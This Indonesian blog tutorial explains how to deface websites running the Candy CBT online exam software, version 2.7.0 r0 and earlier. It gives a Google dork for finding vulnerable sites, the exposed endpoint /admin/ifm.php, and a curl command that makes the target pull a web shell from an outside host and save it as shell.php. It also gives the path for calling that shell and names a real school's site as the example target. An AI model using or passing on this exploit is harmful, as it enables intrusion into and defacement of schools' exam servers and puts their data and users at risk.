Deface Poc Candy CBT v2.7.0 r0 With Termux / Curl

Kali ini mimin akan membahas mengenai Deface yang sebenarnya sudah banyak dilakukan oleh banyak kalangan Hacker, salah satu nya yang akan kita bahas kali ini adalah Deface Poc Candy CBT v2.7.0 r0 With Termux / Curl, Teknik deface ini juga work di versi 2.7.0 r0 ke bawah

Sebelum Kita bahas dulu apa itu Candy CBT

Candy CBT adalah salah satu aplikasi atau software ujian berbasis komputer yang dilakukan secara daring dan kini mulai banyak digunakan oleh berbagai instansi pendidikan karena fitur dan kegunaannya.

Satu hal yang membuatnya lebih menarik, Candy CBT termasuk aplikasi open source yang memungkinkan pengguna untuk mengunduh secara gratis dan memodifikasinya sesuai keperluan

Teknik Deface

Dork

  • "Support By Candy CBT v2.7.0 r0"
  • ( kembangin lagi make otak wibu kalian )

Shell

Termux

Exploit Vulnability

  • /admin/ifm.php

Exploit Shell

  • /files/shell.php

Step 1

Lakukan dorking di google untuk mencari website yang menurut anda vuln, Ciri² website vuln ketika kita memasukkan exploit /admin/ifm.php maka web tersebut akan menuju ke halaman login admin.

- Contoh web : https://smkpgricokro-bwi.sch.id/cbt/admin/ifm.php

Step 2

Buka termux anda dan masukan perintah di bawah ini ;

  • curl https://smkpgricokro-bwi.sch.id/cbt/admin/ifm.php -d 'api=remoteUpload&dir=&filename=shell.php&method=curl&url=http://dhen-bhocil.my.id/tools/shell/byp.txt'

{"status":"OK","message":"File successfully uploaded."}

Step 3

lakukan exploitasi untuk memanggil shell yang sudah kita upload

- Contoh web : https://smkpgricokro-bwi.sch.id/cbt/files/shell.php

Sekian Tutorial dari saya

Posting Komentar

0 Komentar